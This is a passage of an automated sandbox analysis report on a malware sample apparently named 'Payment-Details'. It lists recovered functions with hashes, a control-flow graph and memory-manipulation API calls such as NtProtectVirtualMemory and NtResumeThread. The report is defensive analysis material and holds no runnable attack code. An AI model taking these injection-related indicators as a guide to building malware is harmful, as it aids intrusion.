                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2
                                        • API String ID: 0-450215437
                                        • Opcode ID: 2303ce1f4b0d853d3d10b16ec53a8523a6a5b26203b1bbd11bcd7c83c8fc0e54
                                        • Instruction ID: 80c9b42350a7a92a86b48de9a844a5a6e31f441aa77b4a35dc4f1135ebd2d6e6
                                        • Opcode Fuzzy Hash: 2303ce1f4b0d853d3d10b16ec53a8523a6a5b26203b1bbd11bcd7c83c8fc0e54
                                        • Instruction Fuzzy Hash: 68C2A2B4E002298FDB65DF69C884B9DBBB6FB89300F1081EAD509A7355DB709E85CF50
                                        Function 0723F228 Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 606 723f228-723f249 607 723f250-723f325 call 723fb59 606->607 608 723f24b 606->608 614 723f327-723f332 607->614 615 723f334 607->615 608->607 616 723f33e-723f410 614->616 615->616 625 723f422-723f44d 616->625 626 723f412-723f418 616->626 627 723fabf-723fadb 625->627 626->625 628 723f452-723f57b 627->628 629 723fae1-723fafc 627->629 638 723f58d-723f6e1 628->638 639 723f57d-723f583 628->639 647 723f6e3-723f6e7 638->647 648 723f73a-723f741 638->648 639->638 649 723f6e9-723f6ea 647->649 650 723f6ef-723f735 647->650 651 723f8ec-723f908 648->651 654 723f97c-723f9cb 649->654 650->654 652 723f746-723f834 651->652 653 723f90e-723f932 651->653 678 723f83a-723f8e5 652->678 679 723f8e8-723f8e9 652->679 659 723f934-723f976 653->659 660 723f979-723f97a 653->660 667 723f9dd-723fa28 654->667 668 723f9cd-723f9d3 654->668 659->660 660->654 671 723faa1-723fabc 667->671 672 723fa2a-723fa83 667->672 668->667 671->627 680 723fa8e-723faa0 672->680 678->679 679->651 680->671
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8
                                        • API String ID: 0-4194326291
                                        • Opcode ID: 69fb9cd1e08fcfcd99e6848ea990e1453692c3bcd1e85bb9ba6ac8e10bb4888d
                                        • Instruction ID: e645b5f4644fb11fb7ef5abf1be8a80f4593bbaa2e715255c262f2f15ef08075
                                        • Opcode Fuzzy Hash: 69fb9cd1e08fcfcd99e6848ea990e1453692c3bcd1e85bb9ba6ac8e10bb4888d
                                        • Instruction Fuzzy Hash: CE42B2B5D00629CBDB64DF69C850BD9B7B2BF89300F1486EAD50DA7251DB30AE85CF90
                                        Function 0725C287 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 405e5c2db889f7e33877800f7193ad851a9e033425b52cda9abed2b407875ed1
                                        • Instruction ID: 781976ed703ec258223a5134583246493159a37586f5250a1ff4a29399f74368
                                        • Opcode Fuzzy Hash: 405e5c2db889f7e33877800f7193ad851a9e033425b52cda9abed2b407875ed1
                                        • Instruction Fuzzy Hash: 0C22FAB4A1021ADFDB14CF64C984BADB7B6FF48300F1581A9D909AB395EB749D81CF60
                                        Function 063621B0 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06362241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 7bb09c4946d18eef0ad4d7c30bdbb0ea240fce44e7aebc95dc58d033c202a1cf
                                        • Instruction ID: 11eab13c3d3c00bbc6f873f9df86224b4cabcd567f48d546885337963ec05efa
                                        • Opcode Fuzzy Hash: 7bb09c4946d18eef0ad4d7c30bdbb0ea240fce44e7aebc95dc58d033c202a1cf
                                        • Instruction Fuzzy Hash: F12122B1D003099FDB10DFAAD884ADEFBF5FF48310F20842AE919A7240D775A914CBA0
                                        Function 063621B8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06362241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 5254d6d8c369ee439a5f5de5cf398e2dbdc14b87655c1dcaf769ed2f283a0f7f
                                        • Instruction ID: 0f2c81e7ade3c116324fb751af214ae42d81a7bfa78dd43058990c720503eebf
                                        • Opcode Fuzzy Hash: 5254d6d8c369ee439a5f5de5cf398e2dbdc14b87655c1dcaf769ed2f283a0f7f
                                        • Instruction Fuzzy Hash: E92114B1D003499FDB10DFAAD884ADEFBF5FF48310F20842AE519A7250C7759904CBA0
                                        Function 063632A8 Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtResumeThread.NTDLL(?,?), ref: 0636331E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 34118d80fd667d66388e4c218f4bd24793fc846784387a68a68fab88241bfe6d
                                        • Instruction ID: 776e59660c60ccf6e4384f750afe5f25cc9180dbbac3ab2bfe60365e066e715a
                                        • Opcode Fuzzy Hash: 34118d80fd667d66388e4c218f4bd24793fc846784387a68a68fab88241bfe6d
                                        • Instruction Fuzzy Hash: D01117B1D003499FDB20DFAAC8857DEFBF4AF98620F54842AD419A7240CB759905CFA1
                                        Function 063632B0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtResumeThread.NTDLL(?,?), ref: 0636331E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: e86d1bc1c0833b2238741fbc75821a666be428c1b6eebb73b607a76bf79a609c
                                        • Instruction ID: 6a23e72f46e40cd593b7c168c25533f984e39947d2e4fbcba2e6f158cee05db0
                                        • Opcode Fuzzy Hash: e86d1bc1c0833b2238741fbc75821a666be428c1b6eebb73b607a76bf79a609c
                                        • Instruction Fuzzy Hash: 231117B1D003498FDB10DFAAC88579EFBF4AF88610F54842AD419A7240CB759905CFA1
                                        Function 06361F28 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: v<@
                                        • API String ID: 0-2114727419
                                        • Opcode ID: 37afa0bf984be71405461c53d6a353767a34ad0fcdb34717346691f001939590
                                        • Instruction ID: a6340f6a34f7477d25702b6f30b0b8ec2602a7b53e5c5cc347dbc49dc593586b
                                        • Opcode Fuzzy Hash: 37afa0bf984be71405461c53d6a353767a34ad0fcdb34717346691f001939590
                                        • Instruction Fuzzy Hash: 19711770E01208DFDB44DFA9D581AAEBBF6FF89300F108129E909AB359DB349D45CB91
                                        Function 06361F38 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: v<@
                                        • API String ID: 0-2114727419
                                        • Opcode ID: 2fd84d13d9a432a854957713402d3675342cf86cb2a09d678e2a65e7fda900ec
                                        • Instruction ID: 833ea86a99872efb2093308c9c45b926318cd8b3238ec369dc49e144951a57ed
                                        • Opcode Fuzzy Hash: 2fd84d13d9a432a854957713402d3675342cf86cb2a09d678e2a65e7fda900ec
                                        • Instruction Fuzzy Hash: 1971F670E01209DFDB44DFA9D581AAEBBF6FF89300F108129E919AB358DB349D45CB91
                                        Function 0723F218 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: h
                                        • API String ID: 0-2439710439
                                        • Opcode ID: 37f17c309ddc71f7bd5987ecb41bb4b1971d1401a1c204064e45c68ece67f40f
                                        • Instruction ID: 37f6a4bfe22f7b302f20fe97f00634829bff6390e493ade74220322466db1839
                                        • Opcode Fuzzy Hash: 37f17c309ddc71f7bd5987ecb41bb4b1971d1401a1c204064e45c68ece67f40f
                                        • Instruction Fuzzy Hash: 9261E2B1D006299BEB64DF6ADC50BD9FBB2BF89300F54C2AAC50CA7254DB305A85CF50
                                        Function 072CEC58 Relevance: 1.0, Instructions: 983COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693344911.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_72c0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3673b9c42a6ce6bf373640d1c7e7dbefa9deee88e050f0c945c069aba6699237
                                        • Instruction ID: d0c3071843b6b3cc14846434d6642e491ae62c200809644025b2b498ee2ab1d6
                                        • Opcode Fuzzy Hash: 3673b9c42a6ce6bf373640d1c7e7dbefa9deee88e050f0c945c069aba6699237
                                        • Instruction Fuzzy Hash: F0A2B275A10228DFDB64CF69C984A99BBB2FF89304F1581E9D50DAB325DB319E81CF40
                                        Function 07236AB8 Relevance: .6, Instructions: 602COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d908c0eed335e219bddb60c78b27a00204ce5c1d5187e61b7e5e67c2a450e82
                                        • Instruction ID: ca756d4f2840e52ec46288a6e40ece98d26b4a22f439509d9f859f4aee34dea7
                                        • Opcode Fuzzy Hash: 6d908c0eed335e219bddb60c78b27a00204ce5c1d5187e61b7e5e67c2a450e82
                                        • Instruction Fuzzy Hash: 4E3267F1A1031A8FDB58CFA9C49466EFBF6FB88300F248529E55AD7341DB34A905CB91
                                        Function 070E142C Relevance: .5, Instructions: 471COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8def1721249e26dfdd40e0d39ed06c01b9f4f452adb0a91db6afdad479794028
                                        • Instruction ID: 9613f9b31800ac12e3d58e7b976045e15688df21d4df59a6f838c74655270732
                                        • Opcode Fuzzy Hash: 8def1721249e26dfdd40e0d39ed06c01b9f4f452adb0a91db6afdad479794028
                                        • Instruction Fuzzy Hash: 8532A4B4A042298FCB65DF28C988B99B7BAFF49300F1181D9D94DA7355DB30AE81CF54
                                        Function 070EA748 Relevance: .4, Instructions: 431COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bcdf34dd90f48e6786cb13c36676e17cab2bec86ed5c01d66624ff3a0e958671
                                        • Instruction ID: 6dd2f95c92a467e26f3743d32b239e4592a1a07b1119df6725095e52f3539e50
                                        • Opcode Fuzzy Hash: bcdf34dd90f48e6786cb13c36676e17cab2bec86ed5c01d66624ff3a0e958671
                                        • Instruction Fuzzy Hash: 041281B1E006198FDB54CFAAC98069DFBF6BF88304F24C269D459AB219D734A946CF50
                                        Function 07257E30 Relevance: .4, Instructions: 367COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d82d43602b1fdf5e0d038167469d8d3d5dd88b23da44e03546e62e5613b2b6e
                                        • Instruction ID: bf66ce7b3653a8bc0c8ca344faf6363b0b523c1107e4e3e45cb440e5f7f7895f
                                        • Opcode Fuzzy Hash: 1d82d43602b1fdf5e0d038167469d8d3d5dd88b23da44e03546e62e5613b2b6e
                                        • Instruction Fuzzy Hash: 6FF103B0E25259CFDB64CF69C844BA9BBF6FB8A300F1090A9D90DA7255DBB05D81CF11
                                        Function 07257E21 Relevance: .4, Instructions: 360COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0193c6b216cf28c367cb327e9fbc33a49ffe447cd3e6211678b06f36ff20ed12
                                        • Instruction ID: 0d1dd08d6a43f86899d78f3d0534278d8d9c3639253470241656e8e815676b5f
                                        • Opcode Fuzzy Hash: 0193c6b216cf28c367cb327e9fbc33a49ffe447cd3e6211678b06f36ff20ed12
                                        • Instruction Fuzzy Hash: 2BF100B4E21259CFDB64CF69C844BA9BBF2FF89300F1090AAD909A7255DBB05D85CF11
                                        Function 06365A69 Relevance: .3, Instructions: 299COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef3a2f2b25d4cde471d1e69c990e1e5331ae54c9e0ccafd278e889f394c7b80a
                                        • Instruction ID: 4816d7a367b6d062a840b0ba8e0876194f101c4f9d94a30c2a486c3eae4a4aff
                                        • Opcode Fuzzy Hash: ef3a2f2b25d4cde471d1e69c990e1e5331ae54c9e0ccafd278e889f394c7b80a
                                        • Instruction Fuzzy Hash: 18D169B0D01218CFDB54CFA5C984BADBBF6FB49310F1090A9E50AAB295CB745D89CF91
                                        Function 06365A78 Relevance: .3, Instructions: 286COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a5ebe767f0d9ed85d70c1d702cb68eb3f92a6e17170f41f6b4205f4284858dd
                                        • Instruction ID: a9e2bbea37d4053fe5166373f2a4440de89acf48c4dc122626c85f5063882396
                                        • Opcode Fuzzy Hash: 0a5ebe767f0d9ed85d70c1d702cb68eb3f92a6e17170f41f6b4205f4284858dd
                                        • Instruction Fuzzy Hash: FBC14BB0D01218CFDB54CFA5C984BADBBF6FB49310F1090A9E50AAB295CB745D89CF91
                                        Function 0752D388 Relevance: .3, Instructions: 276COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a23096d6cdc537866506c4b3f375aa4b68b1d1df69406389929886c254df1e4
                                        • Instruction ID: 7e8f3ac3427678a42c597cfad1f111f37e662ea9d29ca6c1cafa7b83040f4c25
                                        • Opcode Fuzzy Hash: 9a23096d6cdc537866506c4b3f375aa4b68b1d1df69406389929886c254df1e4
                                        • Instruction Fuzzy Hash: AAD1B174A00219CFDB14DFA9D894B9DBBB2FF89300F2081A9D509AB365DB35AD81CF50
                                        Function 0723D2A0 Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a3ee92404c84709496c1242b58064e7f8744e17143678013540b93c3712146d
                                        • Instruction ID: ea16b0e3f9427b1b4c5453b4e0d3ffbbf0fff85064d95371e3b95354a114959e
                                        • Opcode Fuzzy Hash: 4a3ee92404c84709496c1242b58064e7f8744e17143678013540b93c3712146d
                                        • Instruction Fuzzy Hash: 91B1F2F0E25219CFDB24CFA9D8887ADBBF6FB4A304F10906AD519A7251DBB45985CF00
                                        Function 0636F6FA Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18a23ec9d5b2e4b4348f87ed30ea947ab62ee13533648480a5f18150958e73fa
                                        • Instruction ID: 9283d61a0426394e533994c2259c25543152d88d94d6a613587998c5011230c6
                                        • Opcode Fuzzy Hash: 18a23ec9d5b2e4b4348f87ed30ea947ab62ee13533648480a5f18150958e73fa
                                        • Instruction Fuzzy Hash: 4FC11870E05208CFEB94CF66E985BADBBF6FB49300F1090A9E509A7259DB345D85CF81
                                        Function 0636E598 Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c7693d9b8fd8f3f2bec2aa631cfa1ea2aa0c5caa82136d825e8e3a4576d1124
                                        • Instruction ID: 5843cf11a323c1065694cff700a9c51a7be2c5baab3fc0e467fc459d135676eb
                                        • Opcode Fuzzy Hash: 6c7693d9b8fd8f3f2bec2aa631cfa1ea2aa0c5caa82136d825e8e3a4576d1124
                                        • Instruction Fuzzy Hash: BDB13678D05218CFEB50CFAAC845BADBBF6FB49300F109069E609A7399D7745989CF81
                                        Function 0636F708 Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4565da74e265784bfa2be58a3e8a8cea68b20793377027ee272343d735eaaaac
                                        • Instruction ID: cb8a57395e50d311a8699ea88de053463e533ef55a7d9b7cd829a18a66205c3e
                                        • Opcode Fuzzy Hash: 4565da74e265784bfa2be58a3e8a8cea68b20793377027ee272343d735eaaaac
                                        • Instruction Fuzzy Hash: D2B10870E05208CFEB94CF66E984BADBBB7FB49300F1090A9E509A7259DB345D85CF81
                                        Function 0636E5A8 Relevance: .3, Instructions: 255COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54b3d640c1a524cbdf68cede4117fbc0a266806e77577deab367f215246f3029
                                        • Instruction ID: 11f53d650c2a5503253664a27f8abc2deb607076b09ff5249396aae60f36404d
                                        • Opcode Fuzzy Hash: 54b3d640c1a524cbdf68cede4117fbc0a266806e77577deab367f215246f3029
                                        • Instruction Fuzzy Hash: A0B12674D05218CFEB50CFAAC845BADBBF6FB49300F109069E609A7399D7745989CF81
                                        Function 0723D290 Relevance: .3, Instructions: 255COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1290979de74baa1336eace2f82f345c4b0b570fdc1d695beaf7c9e8e94afe4b7
                                        • Instruction ID: c476fddf1c2cb726ab9885ce6638db4778e637adf867a8d4fc85d2254525bb3b
                                        • Opcode Fuzzy Hash: 1290979de74baa1336eace2f82f345c4b0b570fdc1d695beaf7c9e8e94afe4b7
                                        • Instruction Fuzzy Hash: D2B1D4F0E25219CFDB24CFA9D8887ADBBF2FB4A304F10906AD519A7251DBB45985CF01
                                        Function 070EBC90 Relevance: .2, Instructions: 245COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c4d720d551d57814fe983efa6db39d8cf66087e8966387e4884db7770226e9d
                                        • Instruction ID: d7903ac63321489e1d89a127fb1cc19cbeb9e76e3bc6ae9693b08c2d5fd57653
                                        • Opcode Fuzzy Hash: 4c4d720d551d57814fe983efa6db39d8cf66087e8966387e4884db7770226e9d
                                        • Instruction Fuzzy Hash: 06B113B0E05208CFDB64CFA9C584BADBBFAFB89304F2081AAD519A7351DB745985CF40
                                        Function 070EBC80 Relevance: .2, Instructions: 241COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba8ef3f0d5752b332962ae7abcd67c4c9bfae5890adc34eee2fac6a68ffa3786
                                        • Instruction ID: e21aafbfac5b73ac8bae47b888f57ddd93d4f10dda0a3880dd984c808daf4da9
                                        • Opcode Fuzzy Hash: ba8ef3f0d5752b332962ae7abcd67c4c9bfae5890adc34eee2fac6a68ffa3786
                                        • Instruction Fuzzy Hash: E5B113B0E05208CFDB64CFA9C584BADBBF6FB89304F2081AAD519A7351EB345985CF40
                                        Function 06364E74 Relevance: .2, Instructions: 228COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba7ffd7876a3ecead6e5d2d6ec90e3ed95b69da61f8e79226ed44195dcd27df8
                                        • Instruction ID: 686f8e54aa0c09720c87d7d2db0718cf802243e20592a287761d8b5ae0b57f08
                                        • Opcode Fuzzy Hash: ba7ffd7876a3ecead6e5d2d6ec90e3ed95b69da61f8e79226ed44195dcd27df8
                                        • Instruction Fuzzy Hash: EDA11674E01208CFDB94CFA5D844BADBBF6FB49304F1090A9E51DAB296CB345985CF91
                                        Function 0636BBDF Relevance: .2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fb42d7ff6a67dcca65b9e62b052a496ea9b681332f931b394411a70f0e46a9c
                                        • Instruction ID: 988f28387d79c6a93b856e65714abcc6c19f0adde581da9e59c0ed836aa6b10d
                                        • Opcode Fuzzy Hash: 2fb42d7ff6a67dcca65b9e62b052a496ea9b681332f931b394411a70f0e46a9c
                                        • Instruction Fuzzy Hash: 70B1F270A01658CFDB64DF19D989BE9B7F6FB49304F1090E5E60AA7254CB349E84CF84
                                        Function 06366728 Relevance: .2, Instructions: 213COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f00184b0989404927c306c16fd80e34393f0e68b63fa39c63b0ea6c080d27d24
                                        • Instruction ID: 5e7897b0c72cb657c572f617a6d6fd918af3533e2cd228e69ed06d5f8193dce4
                                        • Opcode Fuzzy Hash: f00184b0989404927c306c16fd80e34393f0e68b63fa39c63b0ea6c080d27d24
                                        • Instruction Fuzzy Hash: CD913970D01218CFDB44CFA9D9867ADBBF6FB4A340F109069E509A7265DB349D84CF86
                                        Function 06366738 Relevance: .2, Instructions: 208COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab9051cb8d5b03da64bdba5329728be0e31827b0dd3dc8e2d943e207917c82ea
                                        • Instruction ID: f95579019d809269c556d63f2b0f01ff10eccbda7eb13e77021a5e90d826bfd0
                                        • Opcode Fuzzy Hash: ab9051cb8d5b03da64bdba5329728be0e31827b0dd3dc8e2d943e207917c82ea
                                        • Instruction Fuzzy Hash: 04815B70D01218CFDB44CFAAD5867ADBBF9FB4A340F109069E509A7269DB345D84CF86
                                        Function 06366822 Relevance: .2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
